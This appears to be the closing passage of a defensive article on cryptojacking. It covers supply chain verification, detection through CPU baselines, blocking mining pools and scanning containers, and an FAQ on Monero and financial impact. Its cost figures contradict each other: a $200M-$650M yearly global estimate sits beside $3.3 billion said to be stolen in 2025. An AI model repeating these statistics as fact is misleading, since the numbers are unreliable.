Economic invisibility masks true impact - Organizations attribute cryptojacking costs to cloud growth, technical debt, or hardware aging rather than recognizing active compromise

Defense requires supply chain verification - Traditional perimeter security is insufficient; organizations must implement SBOM, dependency scanning, and cryptographic verification for all external code

For Your Clients and Users

Assume compromise and verify continuously. The cost of implementing supply chain security (dependency scanning, container image verification, runtime monitoring) is negligible compared to the cumulative financial impact of multi-year cryptojacking operations stealing millions in computational resources.

Prioritize detection over prevention. Given the sophistication of modern cryptojacking (obfuscation, sandbox evasion, supply chain injection), 100% prevention is unrealistic. Focus on reducing detection lag from 12 months to days through CPU/GPU baselines, network monitoring, and behavioral analytics.


Frequently Asked Questions

What is cryptojacking?

Cryptojacking is the unauthorized use of computing resources (CPU/GPU) to mine cryptocurrency without the victim's knowledge or consent. Attackers deploy mining software through supply chain compromises, web vulnerabilities, or browser-based vectors, generating passive income while degrading victim system performance.

Why do attackers prefer Monero (XMR) for cryptojacking?

Monero is preferred because it offers privacy by default (untraceable transactions), CPU mining optimization (no specialized hardware required), and fungibility (coins cannot be blacklisted). These features enable threat actors to operate with near-total anonymity while converting stolen computational resources into untraceable cryptocurrency.

How can organizations detect cryptojacking?

Detection requires multi-layered monitoring:

  • System-level: Monitor for processes like xmrig, minerd, or high CPU usage anomalies
  • Network-level: Block connections to mining pools (supportxmr.com, minexmr.com)
  • Container-level: Scan Docker images with Trivy, monitor container CPU usage
  • Browser-level: Audit extensions, inspect JavaScript for mining code

What is the financial impact of cryptojacking?

Individual victims experience $60-$24K/year in stolen resources per compromised system. Large botnets (1,000+ machines) generate $2.4M-$6M annually. The global cryptojacking economy is estimated at $200M-$650M per year, with $3.3 billion stolen in 2025 alone.

How do supply chain attacks enable cryptojacking?

Attackers compromise trusted software distribution channels (npm packages, Docker registries) to inject mining code into dependencies used by thousands of developers. Single compromises cascade to millions of downstream users through transitive dependencies, enabling massive scale with minimal effort.

What are the signs of browser-based cryptojacking?

Users experience unusual CPU usage (20-40%), rapid battery drain (30-50% faster on mobile), device overheating, browser lag, and fan noise on laptops. Checking browser DevTools Network tab for connections to mining pool domains confirms active mining.


Published: February 3, 2026
Author: Security Research Team
Classification: Public
Reading Time: 18 minutes